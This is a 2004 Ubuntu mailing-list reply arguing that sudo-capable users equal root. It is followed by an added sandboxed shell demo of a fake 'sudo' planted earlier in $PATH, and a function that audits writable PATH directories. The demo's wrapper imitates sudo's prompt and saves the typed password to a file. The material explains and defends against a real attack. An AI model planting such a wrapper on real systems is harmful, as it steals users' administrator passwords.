sudo security concerns ?

Matt Zimmerman mdz at
Fri Nov 26 20:19:47 UTC 2004

On Fri, Nov 26, 2004 at 12:31:25PM +0100, Eric Feliksik wrote:

> Matt Zimmerman wrote:
> >This was discussed months ago; the reality is that this doesn't open any
> >holes which don't already exist due to the inherent design of programs like
> >su and sudo.  Anyone who has control over a uid with access to su or sudo
> >has control of root as well.
> That's interesting. But how can a program become root if sudo requires a 
> user's password, other than sniffing keystrokes for that user's password?

Sniffing keystrokes for the user's password, placing a trojan ahead of the
real sudo in $PATH, injecting characters on the user's tty to cause commands
to be executed.  There are many possible attacks.

> I always loved the unix way of running everything as user, and become 
> root if you need to... Using windows with its limited "run as 
> administrator" functionality was a pain.
> But this means that running one evil program as user 1000 (sudo'er) on 
> Ubuntu could compromise your system... Thereby the separation of root 
> and user for malware is no longer relevant (well, ok, the malware has to 
> make use of this sudo-situation, but that's just a doorstep).
> The separation is then only useful for preventing the legal user 1000 to 
> accidentally break things (because it's not always root).
> I think this model could use some thought, then?

As I said, the situation is exactly the same with su(1), i.e. the
traditional UNIX security model.  This problem is inherent to any model
which allows a user to run a privileged process under the control of a
less-privileged session.

In truth, Ubuntu's sudo-based configuration more accurately reflects the
reality of traditional UNIX system security: users who have the ability to
become root MUST be considered equivalent to root in terms of security.

Rethinking the UNIX security model is a bit beyond the scope of securing
Ubuntu at this point. ;-)  There are ways to mitigate some of the problems, but
they are not complete solutions, and even so would require a lot of work to
implement and maintain.

 - mdz
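The "trojan ahead of the real sudo in $PATH" attack that mdz lists above, shown in a throwaway sandbox, together with the check a user can run against their own $PATH. This is an added example, not code from the mailing-list post or from Ubuntu; the sandbox layout ($SANDBOX/userbin standing in for a user-writable directory such as ~/bin, $SANDBOX/bin standing in for the directory holding the real sudo), the stand-in sudo script, the function names and the password "hunter2" are all constructed for the demonstration. The stand-in sudo reads the password from stdin so the demo runs offline; the real sudo reads from /dev/tty unless given -S, which a real wrapper would use to replay the captured password.

```shell
#!/bin/sh
# Added example (not from the post): a fake "sudo" dropped earlier in $PATH by a
# process running as the sudo-capable uid, and the $PATH audit that exposes the
# precondition. Everything happens under a mktemp directory; /usr/bin/sudo is
# never touched.
set -eu

# Print every directory of a PATH string, in search order, that the current
# user can write to, stopping at the first directory that actually provides the
# command. Any printed directory is a place where a same-uid process can stage a
# fake $1 that the shell finds before the real one. Args: command, PATH string.
shadow_dirs() {
    cmd=$1
    printf '%s\n' "$2" | tr ':' '\n' | while IFS= read -r dir; do
        if [ -z "$dir" ]; then dir=.; fi        # empty component means cwd
        if [ -w "$dir" ]; then printf '%s\n' "$dir"; fi
        # first directory that holds the command ends the search; if it was
        # writable it has already been reported above
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then break; fi
    done
}

# Build the sandbox: $SANDBOX/bin holds the stand-in for the real sudo and is
# made read-only like a system directory; $SANDBOX/userbin is writable, like a
# user's ~/bin. Prints the sandbox path.
demo_setup() {
    sandbox=$(mktemp -d)
    mkdir -p "$sandbox/userbin" "$sandbox/bin"
    cat > "$sandbox/bin/sudo" <<'EOF'
#!/bin/sh
# stand-in for /usr/bin/sudo (constructed): password on stdin, then report
printf '[sudo] password for %s: ' "$(id -un)"
IFS= read -r pw
printf 'real-sudo: would run as root: %s\n' "$*"
EOF
    chmod 755 "$sandbox/bin/sudo"
    chmod 555 "$sandbox/bin"
    printf '%s\n' "$sandbox"
}

# What malware running as the user does: a wrapper named "sudo" in the writable
# directory that shows the familiar prompt, keeps the password, then hands off
# to the real binary so the victim's command still runs. Arg: sandbox path.
plant_trojan() {
    sandbox=$1
    cat > "$sandbox/userbin/sudo" <<EOF
#!/bin/sh
# trojan (constructed): same prompt as sudo, password copied to a file
printf '[sudo] password for %s: ' "\$(id -un)"
IFS= read -r pw
printf '%s\n' "\$pw" >> '$sandbox/stolen'
printf '%s\n' "\$pw" | '$sandbox/bin/sudo' "\$@"
EOF
    chmod 755 "$sandbox/userbin/sudo"
}

# The victim types "hunter2" at what looks like sudo's prompt and runs a
# command with the sandbox PATH (writable dir first). Prints what the trojan
# captured. Arg: sandbox path.
run_victim() {
    printf 'hunter2\n' | env PATH="$1/userbin:$1/bin" sudo apt-get update >/dev/null
    cat "$1/stolen"
}

demo_teardown() {
    chmod 755 "$1/bin"
    rm -rf "$1"
}

if [ "${1:-}" = "--demo" ]; then
    sb=$(demo_setup)
    echo "writable dirs searched before the real sudo:"
    shadow_dirs sudo "$sb/userbin:$sb/bin"
    plant_trojan "$sb"
    echo "password captured by the fake sudo: $(run_victim "$sb")"
    demo_teardown "$sb"
fi
```

Run it as `sh example.sh --demo`; to audit a real login shell, call `shadow_dirs sudo "$PATH"` and treat any output as the doorstep the reply talks about. The check is deliberately narrow: it says nothing about keystroke sniffing or tty injection, the other two routes mdz names, which need no writable directory at all.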

